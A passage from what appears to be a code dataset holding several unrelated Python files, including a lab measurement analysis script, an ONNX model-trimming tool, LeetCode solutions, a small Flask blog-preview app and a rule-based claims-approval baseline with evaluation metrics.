adjust_step2(out_hop['x'], step_func_fullbw), mode='valid'), 'r', label='CMD + CC comp.')\n ax.plot(t*1e6, np.convolve(alpha_cmd, step_func_fullbw, mode='valid'), 'k', label='CMD only')\n ax.legend()\n\n import pickle\n with open(os.path.join(data_dir, f'basin_hop_cc_nums{nums[0]}.pickle'), 'wb') as handle:\n pickle.dump(out_hop, handle, protocol=pickle.HIGHEST_PROTOCOL)\n plt.close('all')\n\n # other method -- deconvolve\n DECONV = False\n if DECONV:\n FILTER = False\n imp_idx_low = 750\n imp_idx_high = 1500\n\n alpha_cmd, step_func, step_func_fullbw = get_impulse(nums[0])\n beta_cc, _, _ = get_impulse(nums[1])\n\n if FILTER:\n alpha_cmd_filt = butter_lowpass_filter(alpha_cmd, 1e6, FS, order=4)[imp_idx_low:imp_idx_high]\n beta_cc_filt = butter_lowpass_filter(beta_cc, 1e6, FS, order=4)[imp_idx_low:imp_idx_high]\n else:\n alpha_cmd_filt = alpha_cmd[imp_idx_low:imp_idx_high] # cut TODO: pad with zeros?\n beta_cc_filt = beta_cc[imp_idx_low:imp_idx_high]\n\n fig, ax = plt.subplots()\n ax.plot(alpha_cmd_filt, 'b', label='CMD')\n ax.plot(beta_cc_filt, 'r', label='CC')\n fig.suptitle('Cropped impulse response')\n ax.legend()\n\n f1 = -wiener_deconvolution(alpha_cmd_filt,\n beta_cc_filt)\n fig, ax = plt.subplots()\n ax.plot(f1, 'b')\n fig.suptitle('Deconvolution of CMD and CC impulse')\n\n cc_cmd = np.convolve(f1, step_func_fullbw, mode='valid') # same: max(n, m) # full: len(n+m-1), valid: max(m,n) - min(m,n) - 1\n # cc_cmd is shifted by the length of f1 since using valid\n fig, ax = 
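Editor's note: the OPTIMIZE comment suspects L-BFGS-B is stuck in a local minimum, which is what motivates the HOP basin-hopping block. A minimal illustration of that failure mode on a tilted double well (the objective here is invented for the demo):

import numpy as np
from scipy.optimize import minimize, basinhopping

f = lambda x: (x[0] ** 2 - 1) ** 2 + 0.3 * x[0]  # local min near +1, global near -1

local = minimize(f, x0=[1.0], method='L-BFGS-B')
hopped = basinhopping(f, x0=[1.0],
                      minimizer_kwargs={'method': 'L-BFGS-B'}, seed=0)
print(local.x, hopped.x)  # ~[0.96] (stuck) vs ~[-1.04] (escaped)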
plt.subplots()\n # cc_cmd[1745:] = cc_cmd[1745]\n ax.plot(cc_cmd, 'b', label='CC cmd')\n ax.plot(step_func_fullbw, 'r', label='Step function')\n fig.suptitle('')\n\n # TODO: very close, summed waveform creates a small current step function\n # after the CMD pulse that persists for 30 us (or 150 samples)\n # I suspect this is something to do with convolution edge effects, or with\n # DC values in the impulse responses?\n\n idx_cmd_base = len(f1) - 1\n # cut and shift\n for idx_cmd_shift in [0]:\n idx_cmd = idx_cmd_base + idx_cmd_shift\n cc_cmd_cut = cc_cmd\n step_func_fullbw_cut = step_func_fullbw[(idx_cmd):]\n fig, ax = plt.subplots()\n ax.plot(cc_cmd_cut, 'b')\n ax.plot(step_func_fullbw_cut, 'r')\n fig, ax = plt.subplots()\n y = np.convolve(alpha_cmd_filt, step_func_fullbw_cut, mode='valid') + np.convolve(beta_cc_filt, cc_cmd_cut, mode='valid')\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t*1e6, y, 'b')\n ax.plot(t*1e6, np.convolve(alpha_cmd_filt, step_func_fullbw_cut, mode='valid'), 'r')\n\nif 'im_noise' in analysis_type:\n data_dir = data_dir_covg.format(2022, 1, 18)\n filename = 'rf_swp'\n csv_summary = glob.glob(os.path.join(data_dir, f'{filename}_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n\n im_df = pd.DataFrame()\n pa_arr = np.array([])\n idx_start = 4000*5\n for index, r in output.iterrows():\n if r.cmd_val == 0:\n im_data = {}\n t, adc_data = read_h5(data_dir, r.filename + '.h5', [0,1])\n # plt.pause(1)\n plt.close('all')\n\n im_data['rf'] = r.rf\n im_data['ccomp'] = r.ccomp\n im_data['cc_scale'] = r.cc_scale\n im_data['cc_val'] = r.cmd_val\n # idx_noise = idx_timerange(t, noise_time[0], noise_time[1])\n im_data['noise_nofilt'] = np.std(adc_data[0][idx_start:]/dn_per_nA(r.rf*1e3))\n im_data['noise_3k_filt'] = np.std(butter_lowpass_filter(adc_data[0][idx_start:]/dn_per_nA(r.rf*1e3), cutoff=3e3, fs=FS, order=5))\n im_data['filename'] = r.filename\n im_df = im_df.append(im_data, ignore_index=True)\n\n\n# read in all h5 in data_dir and determine peak-area\nif 'plot_all_im' in analysis_type:\n # ax, adc_data, t = read_plot(os.path.join(data_dir, f'cc_swp_{i}.h5'), filter_bw=[None])\n h5_files = glob.glob(os.path.join(data_dir, '*.h5'))\n pa_arr = np.array([])\n for hf in h5_files:\n t, adc_data = read_h5(data_dir, hf.split('/')[-1], chan_list=[0])\n pa, num_found = peak_area(t, adc_data[0])\n pa_arr = np.append(pa_arr, pa)\n\nif 'check_impulse' in analysis_type:\n data_dir = '/Users/koer2434/OneDrive - University of St. 
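Editor's note: the wiener_deconvolution defined in this record can be verified with a round-trip on synthetic data. This check builds an exact circular convolution, matching the FFT model the function assumes, so recovery is limited only by the lambd regularizer:

import numpy as np
from numpy.fft import fft, ifft

rng = np.random.default_rng(1)
x = rng.normal(size=256)
kernel = np.exp(-np.arange(32) / 8.0)
kernel_p = np.hstack((kernel, np.zeros(len(x) - len(kernel))))
obs = np.real(ifft(fft(x) * fft(kernel_p)))      # circular convolution
x_rec = wiener_deconvolution(obs, kernel, lambd=1e-3)
print(np.max(np.abs(x - x_rec)))                 # ~1e-5: near-exact recovery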
Thomas/UST/research/covg/fpga_and_measurements/daq_v2/data/clamp/20220125'\n file_name = 'test_tune_rf100_ccomp47_{}'\n\n tl = 6500\n tr = 6800\n\n idx = 0\n cmd_impulse, t, t0 = get_impulse(data_dir, file_name.format(idx))\n\n fig,ax=plt.subplots()\n ax.plot(t*1e6, cmd_impulse, label='$h_{CMD}$')\n ax.plot(t*1e6, np.cumsum(cmd_impulse/40), label='$\\Sigma_0^t h_{CMD}/40$')\n ax.set_xlabel('t [$\\mu$s]')\n ax.set_ylabel('DN/s')\n ax.set_xlim([tl, tr])\n\n ax.legend()\n plt.tight_layout()\n plt.savefig(os.path.join(fig_dir, 'cmd_impulse_integral.png'))\n\n tl = 6500\n tr = 6800\n\n idx = 1\n cmd_impulse, t, t0 = get_impulse(data_dir, file_name.format(idx))\n\n fig,ax=plt.subplots()\n ax.plot(t*1e6, cmd_impulse, label='$h_{CC}$')\n ax.plot(t*1e6, np.cumsum(cmd_impulse/40), label='$\\Sigma_0^t h_{CC}/40$')\n ax.set_xlabel('t [$\\mu$s]')\n ax.set_ylabel('DN/s')\n ax.set_xlim([tl, tr])\n\n ax.legend()\n plt.tight_layout()\n plt.savefig(os.path.join(fig_dir, 'cc_impulse_integral.png'))\n\n h5_files = glob.glob(os.path.join(data_dir, '*rf*0.h5'))\n fig,ax=plt.subplots()\n\n for hf in h5_files:\n fname = hf.split('/')[-1]\n fname = fname.replace('.h5', '')\n rf_val = int(fname.split('_')[2].replace('rf',''))\n cmd_impulse, t, t0 = get_impulse(data_dir, fname)\n idx = idx_timerange(t, tl*1e-6, tr*1e-6)\n ax.plot(t[idx]*1e6, cmd_impulse[idx], label='$h_{CMD}: ' + ' R_F={} k \\Omega$'.format(rf_val))\n ax.set_xlabel('t [$\\mu$s]')\n ax.set_ylabel('DN/s')\n tl = 6550\n tr = 6750\n ax.set_xlim([tl, tr])\n\n ax.legend()\n plt.tight_layout()\n plt.savefig(os.path.join(fig_dir, 'impulse_sweep.png'))\n","repo_name":"lucask07/covg_fpga","sub_path":"python/analysis/clamp_data.py","file_name":"clamp_data.py","file_ext":"py","file_size_in_byte":30321,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"69889712365","text":"import argparse\nimport onnx\nimport onnx.helper\nimport onnx.version_converter\nfrom onnxsim import simplify\nimport copy\n\nimport sys\nsys.path.append('./basicUtil')\nfrom baseUtil import *\n#from ..basicUtil.baseUtil import *\n\nimport logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input_model\", type=str, default=\"/workspace/nxu/model/customer/gelingshentong/20230717/encoder_new_preopt.onnx\", help=\"input onnx model path\")\n parser.add_argument(\"-o\", \"--output_model\", type=str, default=\"/home/nxu/workspace/model/customer/gelingshentong/20230717/encoder_new_preopt_strip.onnx\", help=\"output onnx model path\")\n parser.add_argument(\"-v\", \"--set_opset_version\", type=int, default=11, help=\"Target opset version\")\n parser.add_argument(\"-t\", \"--tensor_names\", nargs='+', type=str, default=['encoder_out_new', 'onnx__Add_2938_convOut'], help=\"A list of names of nodes to delete\")\n parser.add_argument(\"-u\", \"--untruncated_branch\", nargs='+', type=str, default=['MatMul_1909_Conv'], help=\"Branches that need to be kept during truncation, in list format, fill in node name\")\n parser.add_argument(\"--convert_opset\", action='store_true', help=\"whether to convert opsert version, defualt no modify\")\n args = parser.parse_args()\n return args\n\ndef create_tensor_without_outconnect_to_netoutput(onnx_model):\n netOutNames = [netOutput.name for netOutput in onnx_model.graph.output]\n for node in onnx_model.graph.node:\n for output in node.output:\n outNodesList = 
get_node_by_input(onnx_model, [output])\n if outNodesList or output in netOutNames:\n continue\n outShape = get_shape_by_name(onnx_model, output)\n outDtype = get_dtype_by_name(onnx_model, output)\n newNetOut = onnx.helper.make_tensor_value_info(output, outDtype, outShape)\n onnx_model.graph.output.append(newNetOut)\n netOutNames.append(output)\n return onnx_model\n\ndef convert_opset_version(onnx_model, dst_version):\n onnx_model = onnx.version_converter.convert_version(onnx_model, dst_version)\n onnx_model.ir_version = 7 if onnx_model.ir_version > 7 else onnx_model.ir_version\n return onnx_model\n\nargs = parse_args()\nsrcPath = args.input_model\ndstPath = args.output_model\ndst_opset_version = args.set_opset_version\ntensor_names_list = args.tensor_names\nkept_branchs_list = args.untruncated_branch\nconvert_opset = args.convert_opset\n\nlogger = logging.getLogger(\"[ToolCutModel]\")\nlogger.info('Start chopping the model based on the specified information ...')\nonnx_model = onnx.load_model(srcPath)\nonnx_modelCp = copy.deepcopy(onnx_model)\nnetOutNames = [netOutput.name for netOutput in onnx_modelCp.graph.output]\nfor node in onnx_modelCp.graph.node:\n for output in node.output:\n if output not in tensor_names_list:\n continue\n logger.info('Now, processing %s'%output)\n cur_shape = get_shape_by_name(onnx_modelCp, output)\n curOutNodesList = get_node_by_input(onnx_modelCp, [output])\n while curOutNodesList:\n curOutsList = []\n for curOutNode in curOutNodesList:\n if curOutNode.name in kept_branchs_list:\n continue\n curOutsList += list(curOutNode.output)\n onnx_model.graph.node.remove(curOutNode)\n curOutNodesList = get_node_by_input(onnx_modelCp, curOutsList)\n outDtype = get_dtype_by_name(onnx_modelCp, output)\n output_value_info = onnx.helper.make_tensor_value_info(output, outDtype, cur_shape)\n onnx_model.graph.output.append(output_value_info)\n \nonnx_model = delete_useless_outputOfModel(onnx_model)\nonnx_model = create_tensor_without_outconnect_to_netoutput(onnx_model)\nonnx_model = delete_useless_input_in_initializer(onnx_model)\nonnx_model = delete_useless_value_info(onnx_model)\nlogger.info('Finish chop the model!')\n\nif convert_opset:\n logger.info('Start converting opset version for the model ...')\n onnx_model = convert_opset_version(onnx_model, dst_opset_version)\n logger.info('Finish convert opset version!')\n\nonnx_model, check = simplify(onnx_model)\nlogger.info(\"Saving output model to '%s'\"%dstPath)\nonnx.save_model(onnx_model, dstPath)\nlogger.info('Process Finish!')","repo_name":"xncaffe/deployOnnxGraphOpt","sub_path":"tools/cut_model.py","file_name":"cut_model.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"23099245558","text":"class Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n x,y = reduce(lambda x,y:x^y,nums),1\n while x&y != y:\n y <<= 1\n c1,c2 = 0,0\n for z in nums:\n if z&y == y:\n c1 ^= z\n else:\n c2 ^= z\n return [c1,c2]","repo_name":"duduscript/leetcode","sub_path":"260/SingleNumberIII.py","file_name":"SingleNumberIII.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"17303263953","text":"from flask import Flask, render_template\nimport requests\n\napp = Flask(__name__)\n\n\"\"\"Fetch the latest post for embedded context\"\"\"\ndef get_post_embed():\n request = 
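Editor's note: cut_model.py star-imports its graph helpers (get_node_by_input, get_shape_by_name, get_dtype_by_name, ...) from baseUtil, which is not shown. A plausible sketch of the first helper, consistent with how it is called above; this is an assumption, not the actual baseUtil code:

def get_node_by_input(onnx_model, input_names):
    # Return every node in the graph that consumes any tensor in input_names.
    return [node for node in onnx_model.graph.node
            if any(inp in input_names for inp in node.input)]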
requests.get('https://life.lunatech.com/wp-json/wp/v2/posts/?context=embed&per_page=1')\n post = request.json()[0]\n return {'link': post['link'], 'title': post['title']['rendered'], 'featured_media': post['featured_media'], 'featured_media_url': post['jetpack_featured_media_url']}\n\n@app.route('/')\ndef home():\n pe = get_post_embed()\n return render_template('home.html', title=pe['title'], link=pe['link'], image=pe['featured_media_url'])\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"lunatech-labs/lunatech-website-group","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21944027675","text":"#\n# @lc app=leetcode id=91 lang=python3\n#\n# [91] Decode Ways\n#\n\n# @lc code=start\nclass Solution: \n def numDecodings(self, s: str) -> int:\n # def isValid(str):\n # if str[0] == '0':\n # return False\n # return True\n \n # def dfs(start, path):\n # if start == len(s):\n # res.append(''.join(path))\n # return \n \n # for i in s:\n # if isValid\n\n # With n digits, there are O(2^n) nodes in the state-space tree.\n # We do O(1) operation for each node so the overall time complexity is O(2^n).\n memo = {}\n\n def dfs(start_index):\n if start_index in memo:\n return memo[start_index]\n if start_index == len(s):\n return 1\n\n ways = 0\n # can't decode string with leading 0\n if s[start_index] == '0':\n return ways\n # decode one digit\n ways += dfs(start_index + 1)\n # decode two digits\n if 10 <= int(s[start_index: start_index + 2]) <= 26:\n ways += dfs(start_index + 2)\n memo[start_index] = ways\n return ways\n\n return dfs(0)\n \n # The time complexity of the memoization solution is the size of the memo array O(n) multiplied by the number of operations per state which is O(1). 
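Editor's note: get_post_embed above indexes request.json()[0] directly, which raises IndexError if the WordPress API returns no posts. A defensive variant under the same field assumptions (the _safe name and the timeout are additions):

def get_post_embed_safe():
    resp = requests.get(
        'https://life.lunatech.com/wp-json/wp/v2/posts/?context=embed&per_page=1',
        timeout=10)
    posts = resp.json()
    if not posts:                        # no published posts
        return None
    post = posts[0]
    return {'link': post['link'],
            'title': post['title']['rendered'],
            'featured_media': post['featured_media'],
            'featured_media_url': post['jetpack_featured_media_url']}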
\n # So the overall time complexity is O(n).\n# @lc code=end\n\n","repo_name":"yihaozhong/LPractice","sub_path":"91.decode-ways.py","file_name":"91.decode-ways.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"12168581200","text":"import os\nimport subprocess\n\nfrom dotenv import load_dotenv\n\n\ndef run_data_ingestion():\n dotenv_path = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"../../../.env\"\n )\n load_dotenv(dotenv_path)\n\n args = {\n \"sa_path\": os.environ.get(\"SA_PATH\"),\n \"bucket\": os.environ.get(\"BUCKET\"),\n \"project_id\": os.environ.get(\"PROJECT_ID\"),\n }\n\n command = [\"python\", \"data_ingestion.py\"]\n\n for key, value in args.items():\n if value is not None:\n command.extend([\"--\" + key, str(value)])\n\n subprocess.run(command)\n\n\nif __name__ == \"__main__\":\n run_data_ingestion()\n","repo_name":"tamerajaj/w2d5-mle-data-pipeline-project","sub_path":"src/cloud-etl/data-ingestion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32477419453","text":"import csv\nfrom sklearn.metrics import confusion_matrix\n\nprovider_names = {}\nregions = {}\ndiagnosis_codes = {}\ndiagnosis_names = {}\n\n# read all training files and form rules\nwith open('data/training/Diagnosis_Code_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n diagnosis_codes[row[0]] = 1\n\nwith open('data/training/Diagnosis_Code_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n diagnosis_codes[row[0]] = 0\n\nwith open('data/training/Diagnosis_Name_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n diagnosis_names[row[0]] = 1\n\nwith open('data/training/Diagnosis_Name_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n diagnosis_names[row[0]] = 0\n\nwith open('data/training/provier_approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n provider_names[row[0]] = 1\n\nwith open('data/training/provier_deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n provider_names[row[0]] = 0\n\nwith open('data/training/Region_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n regions[row[0]] = 1\n\nwith open('data/training/Region_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n regions[row[0]] = 0\n\n# read 100% approved and denied in the test set\ntest_provider_names = {}\ntest_regions = {}\ntest_diagnosis_codes = 
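Editor's note: the memoized Decode Ways solution above is O(n); the same recurrence also has a bottom-up O(1)-space form, sketched here for comparison (not part of the original submission):

def num_decodings_dp(s: str) -> int:
    if not s or s[0] == '0':
        return 0
    prev2, prev1 = 1, 1                       # ways(i-2), ways(i-1)
    for i in range(1, len(s)):
        cur = 0
        if s[i] != '0':                       # decode one digit
            cur += prev1
        if 10 <= int(s[i - 1:i + 1]) <= 26:   # decode two digits
            cur += prev2
        prev2, prev1 = prev1, cur
    return prev1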
{}\ntest_diagnosis_names = {}\n\nwith open('data/test/Diagnosis_Code_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_diagnosis_codes[row[0]] = 1\n\nwith open('data/test/Diagnosis_Code_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_diagnosis_codes[row[0]] = 0\n\nwith open('data/test/Diagnosis_Name_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_diagnosis_names[row[0]] = 1\n\nwith open('data/test/Diagnosis_Name_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_diagnosis_names[row[0]] = 0\n\nwith open('data/test/Provider_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_provider_names[row[0]] = 1\n\nwith open('data/test/Provider_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_provider_names[row[0]] = 0\n\nwith open('data/test/Region_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_regions[row[0]] = 1\n\nwith open('data/test/Region_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_regions[row[0]] = 0\n# ****************************************\n\npredicted = []\nlabeled = []\n\ntotal_correct_prediction = 0\ntotal_100_in_train_and_test = 0\ntotal_100_correct_prediction = 0\ntotal_below_100_or_100_in_test_not_train = 0\ntotal_below_100_or_100_in_test_not_train_correct_prediction = 0\n# read test file\nwith open('data/test.csv', newline='') as testfile:\n test_reader = csv.DictReader(testfile, delimiter=',')\n check_columns = [\"feed_id_full_path\", \"Diagnosis_Code\", \"Diagnosis_Name\", \"Requesting_Provider\", \"Overall_Auth_Status\",\"Line_Item_Status\",\"Status_Reason\"]\n header = True\n for row in test_reader:\n if header:\n header = False\n continue\n\n if 'APPROVE' == row['Overall_Auth_Status']:\n current_label = 1\n else:\n current_label = 0\n\n labeled.append(current_label)\n\n provider_name = row['Requesting_Provider']\n region = row['feed_id_full_path']\n diagnosis_code = row['Diagnosis_Code']\n diagnosis_name = row['Diagnosis_Name']\n\n # try to make incorrect prediction xor 1\n predicted_label = current_label ^ 1\n\n if provider_name in provider_names:\n predicted_label = provider_names[provider_name]\n predicted.append(predicted_label)\n total_100_in_train_and_test = total_100_in_train_and_test + 1\n elif region in regions:\n predicted_label = regions[region]\n predicted.append(predicted_label)\n total_100_in_train_and_test = total_100_in_train_and_test + 1\n elif diagnosis_code in diagnosis_codes:\n predicted_label = diagnosis_codes[diagnosis_code]\n predicted.append(predicted_label)\n 
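Editor's note: the sixteen CSV readers above differ only in file path and label. A small helper (hypothetical, not in the original) collapses the pattern:

import csv

def load_label_map(path, label):
    # First CSV column (header skipped) -> {value: label}.
    mapping = {}
    with open(path, newline='') as f:
        reader = csv.reader(f)
        next(reader)                 # skip the header row
        for row in reader:
            mapping[row[0]] = label
    return mapping

# e.g.:
# diagnosis_codes = {**load_label_map('data/training/Diagnosis_Code_Approve.csv', 1),
#                    **load_label_map('data/training/Diagnosis_Code_Deny.csv', 0)}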
total_100_in_train_and_test = total_100_in_train_and_test + 1\n elif diagnosis_name in diagnosis_names:\n predicted_label = diagnosis_names[diagnosis_name]\n predicted.append(diagnosis_names[diagnosis_name])\n total_100_in_train_and_test = total_100_in_train_and_test + 1\n else:\n # try to make incorrect prediction\n predicted_label = 1 # predict true by default\n predicted.append(predicted_label)\n\n if predicted_label == current_label:\n total_correct_prediction = total_correct_prediction + 1\n # count 100% correct prediction\n if provider_name in test_provider_names and provider_name in provider_names and current_label == provider_names[provider_name]:\n total_100_correct_prediction = total_100_correct_prediction + 1\n elif region in test_regions and region in regions and current_label == regions[region]:\n total_100_correct_prediction = total_100_correct_prediction + 1\n elif diagnosis_code in test_diagnosis_codes and diagnosis_code in diagnosis_codes and current_label == diagnosis_codes[diagnosis_code]:\n total_100_correct_prediction = total_100_correct_prediction + 1\n elif diagnosis_name in test_diagnosis_names and diagnosis_name in diagnosis_names and current_label == diagnosis_names[diagnosis_name]:\n total_100_correct_prediction = total_100_correct_prediction + 1\n\n # count < 100% accuracy\n if (provider_name not in provider_names) and \\\n (region not in regions) and \\\n (diagnosis_code not in diagnosis_codes) and \\\n (diagnosis_name not in diagnosis_names):\n\n total_below_100_or_100_in_test_not_train = total_below_100_or_100_in_test_not_train + 1\n if predicted_label == current_label:\n total_below_100_or_100_in_test_not_train_correct_prediction = total_below_100_or_100_in_test_not_train_correct_prediction + 1\n\n\nCM = confusion_matrix(labeled, predicted, labels=[1, 0])\nTN, FP, FN, TP = CM.ravel()\n# TN = CM[0][0]\n# FN = CM[1][0]\n# TP = CM[1][1]\n# FP = CM[0][1]\ncount_true = 0\nfor i in range(len(labeled)):\n if labeled[i] == predicted[i]:\n count_true = count_true + 1\n\nprecision = TP / (TP + FP)\nrecall = TP / (TP + FN)\nfscore = (2*TP) / (2*TP + FP + FN)\naccuracy = (TP + TN) / (TP + TN + FN + FP)\n\nprint('total test set:', len(predicted))\nprint('total test set -correct prediction:', total_correct_prediction)\n\nprint()\nprint('total 100% accuracy:', total_100_in_train_and_test)\nprint('total 100% accuracy correct prediction:', total_100_correct_prediction)\nprint('100% accuracy prediction: ', (total_100_correct_prediction / total_100_in_train_and_test))\n\nprint()\nprint('total below or 100% accuracy in test not in train:', total_below_100_or_100_in_test_not_train)\nprint('total below or 100% accuracy in test not in train - correct prediction:', total_below_100_or_100_in_test_not_train_correct_prediction)\nprint('below or 100% accuracy in test not in train - accuracy prediction: ', (total_below_100_or_100_in_test_not_train_correct_prediction / total_below_100_or_100_in_test_not_train))\n\nprint()\nprint('Overall')\nprint('precision:', precision, ';recall:', recall)\nprint('f-score:', fscore, ';accuracy:', accuracy)\n\n","repo_name":"litpuvn/insured-prediction","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6054646981","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 20 22:12:33 2020\n設計一個程式由1~10的亂數隨機產生一10*10的二維陣列,將行列互換輸出(即輸出轉置矩陣)\n@author: ASUS\n\"\"\"\nimport numpy as np\nimport random as rnd\nary 
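Editor's note: one caveat in the metrics block above. With labels=[1, 0], scikit-learn orders the confusion matrix positive-class-first, so CM.ravel() yields (TP, FN, FP, TN); the unpacking TN, FP, FN, TP = CM.ravel() therefore swaps the classes, and the printed precision, recall, and F-score describe the deny class rather than approve (accuracy is symmetric and unaffected). Corrected unpacking:

# confusion_matrix(labeled, predicted, labels=[1, 0]):
# row/col 0 is the positive class, so row-major ravel() is (TP, FN, FP, TN).
TP, FN, FP, TN = CM.ravel()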
= np.zeros((10,10),dtype=int)\nary2 = np.zeros((10,10),dtype=int)\n\nfor i in range(10):\n for j in range(10):\n number= rnd.randint(1,10);\n ary[i][j]=number\n \nprint('未轉置前:')\nprint(ary)\nfor i in range(10):\n for j in range(10):\n ary2[i][j]=ary[j][i]\nprint('轉置後:')\nprint(ary2)","repo_name":"Hansel-Lin420/Python_Asia100","sub_path":"Ex05.py","file_name":"Ex05.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70666386925","text":"import numpy as np\nimport pandas as pd\nimport os\n\nfrom . import defaults, misc\ndefault_dir = defaults.base_dir() + 'crosswalk/'\n\ndata_dir = default_dir\n\ndef county_to_zip(year=2000, zip_level=5, data_dir=default_dir, reimport=False):\n\n assert zip_level in [1, 2, 3, 4, 5]\n\n pkl_file = data_dir + 'county_to_zip{0:d}_{1:d}.pkl'.format(zip_level, year)\n if reimport or (not os.path.exists(pkl_file)):\n\n names = ['fips', 'zip', 'county_name', 'zip_name', 'pop', 'factor']\n df = pd.read_csv(data_dir + 'county_to_zip_{:d}.csv'.format(year),\n skiprows=2, header=None, names=names, \n usecols=['fips', 'zip', 'factor'])\n\n if zip_level < 5:\n to_drop = 5 - zip_level\n zip_var = 'zip' + str(zip_level)\n df[zip_var] = df['zip'].astype(str).str[:-to_drop].astype(np.int)\n df = df.groupby(['fips', zip_var])['factor'].sum().to_frame(name='factor')\n df = df.reset_index()\n else:\n zip_var = 'zip'\n \n df['total'] = df.groupby(['fips'])['factor'].transform(sum)\n df['factor'] /= df['total']\n df = df.drop(columns=['total'])\n \n df.to_pickle(pkl_file)\n\n else:\n\n df = pd.read_pickle(pkl_file)\n\n return df\n\ndef county_to_zip_hud(data_dir=default_dir, reimport=True):\n \n parquet_file = data_dir + 'county_to_zip_hud.parquet'\n if reimport or (not os.path.exists(parquet_file)):\n df = pd.read_excel(data_dir + 'COUNTY_ZIP_122021.xlsx')\n df.to_parquet(parquet_file)\n else:\n df = pd.read_parquet(parquet_file)\n \n return df\n\ndef zip_to_county_hud(data_dir=default_dir, reimport=True):\n \n parquet_file = data_dir + 'zip_to_county_hud.parquet'\n if reimport or (not os.path.exists(parquet_file)):\n df = pd.read_excel(data_dir + 'ZIP_COUNTY_122021.xlsx')\n df.to_parquet(parquet_file)\n else:\n df = pd.read_parquet(parquet_file)\n \n return df\n \n\n#def load(origin='county', destination='zip', year=2000, data_dir=default_dir, reimport=False):\n#\n# intermediate_dests = {\n# 'zip3' :' zip',\n# }\n#\n# pkl_file = data_dir + '{0}_to_{1}_{2:d}.pkl'.format(origin, destination, year)\n# if reimport or os.path.exists(pkl_file):\n#\n# this_dest = intermediate_dests.get(destination, destination)\n# df = pd.read_csv(data_dir + '{0}_to_{1}_{2:d}'.format(origin, this_dest))\n#\n# else:\n#\n# df = pd.read_pickle(pkl_file)\n#\n# return df\n","repo_name":"dgreenwald/py_tools","sub_path":"datasets/crosswalk.py","file_name":"crosswalk.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25127085841","text":"# -*- coding:utf-8 -*-\n\nimport botpath\nimport logging\nfrom termcolor import colored, cprint\nimport rasa_core\n\nTEST_DIALOG = False\n\n\n\n\n\ndef run():\n 